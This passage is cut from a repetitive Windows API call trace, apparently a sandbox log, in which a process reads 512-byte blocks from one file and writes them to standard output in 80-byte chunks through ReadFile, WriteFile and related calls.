lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] GetFileType 
(hFile=0x4c) returned 0x1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] GetFileType (hFile=0x4c) returned 0x1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] GetFileType (hFile=0x4c) returned 0x1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] GetFileType (hFile=0x4c) returned 0x1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] GetFileType (hFile=0x4c) returned 0x1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] GetFileType (hFile=0x4c) returned 0x1 [0094.211] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.211] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.211] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.211] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.211] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] GetFileType (hFile=0x4c) returned 0x1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] GetFileType (hFile=0x4c) returned 0x1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] GetFileType (hFile=0x4c) returned 0x1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] GetFileType (hFile=0x4c) returned 0x1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, 
lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] GetFileType (hFile=0x4c) returned 0x1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] GetFileType (hFile=0x4c) returned 0x1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] GetFileType (hFile=0x4c) returned 0x1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] GetFileType (hFile=0x4c) returned 0x1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.212] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.212] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.212] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.212] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] GetFileType (hFile=0x4c) returned 0x1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] GetFileType (hFile=0x4c) returned 0x1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] GetFileType (hFile=0x4c) returned 0x1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] GetFileType (hFile=0x4c) returned 0x1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] GetFileType (hFile=0x4c) returned 0x1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] GetFileType (hFile=0x4c) returned 0x1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] WriteFile (in: 
hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] GetFileType (hFile=0x4c) returned 0x1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] GetFileType (hFile=0x4c) returned 0x1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.213] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.213] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.213] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.213] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] GetFileType (hFile=0x4c) returned 0x1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] GetFileType (hFile=0x4c) returned 0x1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.213] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0094.213] GetFileType (hFile=0x4c) returned 0x1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] GetFileType (hFile=0x4c) returned 0x1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] GetFileType (hFile=0x4c) returned 0x1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] GetFileType (hFile=0x4c) returned 0x1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] GetFileType (hFile=0x4c) returned 0x1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0094.214] GetFileType (hFile=0x4c) returned 0x1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.214] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.214] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.214] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.214] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] GetFileType (hFile=0x4c) returned 0x1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] GetFileType (hFile=0x4c) returned 0x1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] GetFileType (hFile=0x4c) returned 0x1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] GetFileType (hFile=0x4c) returned 0x1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, 
lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] GetFileType (hFile=0x4c) returned 0x1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] GetFileType (hFile=0x4c) returned 0x1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] GetFileType (hFile=0x4c) returned 0x1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] GetFileType (hFile=0x4c) returned 0x1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.215] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.215] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.215] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.215] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] GetFileType (hFile=0x4c) returned 0x1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] GetFileType (hFile=0x4c) returned 0x1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] GetFileType (hFile=0x4c) returned 0x1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] GetFileType (hFile=0x4c) returned 0x1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] GetFileType (hFile=0x4c) returned 0x1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] GetFileType (hFile=0x4c) returned 0x1 [0094.216] _get_osfhandle (_FileHandle=1) returned 
0x4c [0094.216] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] GetFileType (hFile=0x4c) returned 0x1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] GetFileType (hFile=0x4c) returned 0x1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.217] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.217] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.217] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.217] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.217] GetFileType (hFile=0x4c) returned 0x1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.217] GetFileType (hFile=0x4c) returned 0x1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.217] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) 
returned 1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.217] GetFileType (hFile=0x4c) returned 0x1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.217] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.217] GetFileType (hFile=0x4c) returned 0x1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.217] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.217] GetFileType (hFile=0x4c) returned 0x1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.217] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.217] GetFileType (hFile=0x4c) returned 0x1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] GetFileType (hFile=0x4c) returned 0x1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.218] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0094.218] GetFileType (hFile=0x4c) returned 0x1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.218] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.218] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.218] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.218] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] GetFileType (hFile=0x4c) returned 0x1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] GetFileType (hFile=0x4c) returned 0x1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] GetFileType (hFile=0x4c) returned 0x1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] GetFileType (hFile=0x4c) returned 0x1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, 
